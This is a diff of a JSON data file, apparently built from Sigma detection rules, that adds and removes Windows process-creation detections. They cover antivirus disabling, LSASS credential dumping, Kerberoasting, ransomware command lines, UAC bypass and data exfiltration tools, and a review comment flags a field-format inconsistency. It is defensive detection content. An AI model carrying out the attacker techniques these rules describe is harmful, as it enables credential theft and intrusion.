"proc_creation_win_susp_ps_downloadfile.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" + ] + }, + "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "value": "PowerShell DownloadFile" + }, + { + "description": "Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.\nAdversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service\n", + "meta": { + "author": "frack113", + "creation_date": "2021/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_modification.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6783aa9e-0dc3-49d4-a94a-8b39c5fd700b", + "value": "Stop Or Remove Antivirus Service" + }, + { + "description": "Detects potential suspicious behaviour using secedit.exe. 
Such as exporting or modifying the security policy", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/11/18", + "falsepositive": [ + "Legitimate administrative use" + ], + "filename": "proc_creation_win_susp_secedit.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" + ], + "tags": [ + "attack.discovery", + "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", + "attack.privilege_escalation", + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" + ] + }, + "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", + "value": "Potential Suspicious Activity Using SeCEdit" + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate script" + ], + "filename": "proc_creation_win_msiexec_execute_dll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + 
"https://twitter.com/_st0pp3r_/status/1583914515996897281", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", + "value": "Suspicious Msiexec Execute Arbitrary DLL" + }, + { + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_purplesharp_indicators.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/mvelazc0/PurpleSharp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml" + ], + "tags": [ + "attack.t1587", + "attack.resource_development" + ] + }, + "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "value": "PurpleSharp Indicator" }, { "description": "Detects one of the possible scenarios for disabling symantec endpoint protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", 
@@ -55992,56 +49789,527 @@ "value": "Taskkill Symantec Endpoint Protection" }, { - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "description": "Detects, possibly, malicious unauthorized usage of bcdedit.exe", "meta": { - "author": "Sreeman", - "creation_date": "2020/01/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_task_folder_evasion.yml", - "level": "high", + "author": "@neu5ron", + "creation_date": "2019/02/07", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_bcdedit.yml", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/subTee/status/1216465628946563073", - "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml" + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", + "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml" ], "tags": [ "attack.defense_evasion", + "attack.t1070", "attack.persistence", - "attack.execution", - "attack.t1574.002" + "attack.t1542.003" ] }, - "uuid": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "value": "Tasks Folder Evasion" + "uuid": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "value": "Possible Ransomware or Unauthorized MBR Modifications" }, { - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "description": "Detects Service Principal Name Enumeration used for Kerberoasting", "meta": { - 
"author": "@SerkinValery", - "creation_date": "2022/09/16", + "author": "Markus Neis, keepwatch", + "creation_date": "2018/11/14", "falsepositive": [ - "Unknown" + "Administrator Activity" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml", + "filename": "proc_creation_win_spn_enum.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spn_enum.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", + "value": "Possible SPN Enumeration" + }, + { + "description": "Detects when attackers use \"sc.exe\" to delete AV services from the system in order to avoid detection", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)" + ], + "filename": "proc_creation_win_sc_delete_av_services.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", - "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" + ] 
+ }, + "uuid": "7fd4bb39-12d0-45ab-bb36-cebabc73dc7b", + "value": "Suspicious Execution of Sc to Delete AV Services" + }, + { + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/21", + "falsepositive": [ + "File located in the AppData folder with trusted signature" + ], + "filename": "proc_creation_win_susp_microsoft_onenote_child_process.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_microsoft_onenote_child_process.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" + ] + }, + "uuid": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "value": "Suspicious Microsoft OneNote Child Process" + }, + { + "description": "Detects Ryuk Ransomware command lines", + "meta": { + "author": "Vasiliy Burov", + "creation_date": "2019/08/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_mal_ryuk.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_ryuk.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ] + }, + "uuid": "0acaad27-9f02-4136-a243-c357202edd74", + "value": "Ryuk Ransomware Command Line Activity" + }, + { + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "meta": 
{ + "author": "Markus Neis, @Karneades", + "creation_date": "2018/03/06", + "falsepositive": [ + "False positives are possible, depends on organisation and processes" + ], + "filename": "proc_creation_win_powersploit_empire_schtasks.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", + "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", + "value": "Default PowerSploit and Empire Schtasks Persistence" + }, + { + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/31", + "falsepositive": [ + "Rare legitimate inline scripting by some administrators" + ], + "filename": "proc_creation_win_wscript_shell_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "2c28c248-7f50-417a-9186-a85b223010ee", + "value": "Wscript Shell Run In CommandLine" + }, + { + "description": "Detects 
uninstallation or termination of security products using the WMIC utility", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/01/30", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_susp_wmic_security_product_uninstall.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://twitter.com/cglyer/status/1355171195654709249", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "value": "Wmic Uninstall Security Product" + }, + { + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/23", + "falsepositive": [ + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" + ], + "filename": "proc_creation_win_susp_explorer_nouaccheck.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ORCA6665/status/1496478087244095491", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "value": "Explorer NOUACCHECK Flag" + }, + { + "description": 
"Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/10/30", + "falsepositive": [ + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" + ], + "filename": "proc_creation_win_susp_procdump_lsass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" + ] + }, + "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", + "value": "Suspicious Use of Procdump on LSASS" + }, + { + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "meta": { + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "creation_date": "2021/09/30", + "falsepositive": [ + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", + "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567" + ] + }, + "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_chafer_mar18.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "value": "Chafer Activity" + }, + { 
+ "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "meta": { + "author": "Nasreddine Bencherchali, X__Junior", + "creation_date": "2022/11/30", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_gpg4win_susp_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "value": "Gpg4Win Decrypt Files From Suspicious Locations" + }, + { + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_unusual_child_process_of_dns_exe.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_child_process_of_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "value": "Unusual Child Porcess of dns.exe" + }, + { + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_psr_capture_screenshots.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", + "https://lolbas-project.github.io/lolbas/Binaries/Psr/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "2158f96f-43c2-43cb-952a-ab4580f32382", + "value": "Psr.exe Capture Screenshots" + }, + { + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_dumpstack_log_evasion.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1479094189048713219", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "value": "DumpStack.log Defender Evasion" + }, + { + "description": "Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts.", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, omkar72", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of the utilities by legitimate user for legitimate reason" + ], + "filename": "proc_creation_win_trust_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", + "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ] + }, + "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", + "value": "Domain Trust Discovery" + }, + { + "description": "Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020", + "meta": { + "author": "Markus Neis, Swisscom", + "creation_date": "2020/06/18", + "falsepositive": [ + "Will need to be looked for combinations of those processes" + ], + "filename": "proc_creation_win_apt_ke3chang_regadd.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml" + ], + "tags": [ + "attack.g0004", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": 
"7b544661-69fc-419f-9a59-82ccc328f205", + "value": "Ke3chang Registry Key Modifications" + }, + { + "description": "Detects capture a network trace via netsh.exe trace functionality", + "meta": { + "author": "Kutepov Anton, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason" + ], + "filename": "proc_creation_win_netsh_packet_capture.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "value": "Capture a Network Trace with netsh.exe" + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "meta": { + "author": "Tim Burrell", + "creation_date": "2020/02/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_gallium_sha1.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml" ], "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1212", + "attack.command_and_control", + "attack.t1071" ] }, - "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", - "value": 
"Suspicious Command With Teams Objects Pathes" + "uuid": "440a56bf-7873-4439-940a-1c8a671073c2", + "value": "GALLIUM Sha1 Artefacts" }, { "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", 
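Review bot: The new entry `"value": "Possible Ransomware or Unauthorized MBR Modifications"` (first added object in this hunk) carries `"falsepositive": "No established falsepositives"` as a bare string, while every other added entry in the hunk encodes `falsepositive` as an array of strings; a consumer that iterates the field will fail or iterate characters on this one record. The file looks like it is generated from the upstream Sigma YAML, where the falsepositives field may be a scalar, so the fix belongs in the generator: coerce scalars to a one-element list so the field is always `"falsepositive": [ "No established falsepositives" ]`. The same hunk also adds `"value": "Unusual Child Porcess of dns.exe"`, which appears to be a typo inherited from the upstream rule title; correcting it here would be undone on the next regeneration, so it should be fixed upstream.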
@@ -56071,1611 +50339,619 @@ "value": "Terminal Service Process Spawn" }, { - "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/24", - "falsepositive": [ - "Legitimate files with these rare hacktool names" - ], - "filename": "proc_creation_win_tools_relay_attacks.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1557/001/", - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://pentestlab.blog/2017/04/13/hot-potato/", - "https://github.com/ohpe/juicy-potato", - "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", - "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" - ], - "tags": [ - "attack.execution", - "attack.t1557.001" - ] - }, - "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", - "value": "SMB Relay Attack Tools" - }, - { - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/31", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_tools_uac_bypass_computerdefaults.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", - "value": "UAC Bypass Tools 
Using ComputerDefaults" - }, - { - "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "description": "Detects suspicious flags used by PsExec and PAExec but no usual program name in command line", "meta": { "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/01/24", + "creation_date": "2021/05/22", "falsepositive": [ - "Legitimate use by administrators" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], - "filename": "proc_creation_win_tool_nircmd.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.nirsoft.net/utils/nircmd.html", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://www.nirsoft.net/utils/nircmd2.html#using", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", - "value": "NirCmd Tool Execution" - }, - { - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali @nas_bench", - "creation_date": "2022/01/24", - "falsepositive": [ - "Legitimate use by administrators" - ], - "filename": "proc_creation_win_tool_nircmd_as_system.yml", + "filename": "proc_creation_win_susp_psexex_paexec_flags.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.nirsoft.net/utils/nircmd.html", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://www.nirsoft.net/utils/nircmd2.html#using", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" ], "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.resource_development", + "attack.t1587.001" ] }, - "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", - "value": "NirCmd Tool Execution As LOCAL SYSTEM" + "uuid": "207b0396-3689-42d9-8399-4222658efc99", + "value": "PsExec/PAExec Flags" }, { - "description": "Detects the use of NSudo tool for command execution", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/01/24", - "falsepositive": [ - "Legitimate use by administrators" - ], - "filename": "proc_creation_win_tool_nsudo_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://nsudo.m2team.org/en-us/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", - "value": "NSudo Tool Execution" - }, - { - "description": "Detects PsExec service execution via default service image name", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/06/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_tool_psexec.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
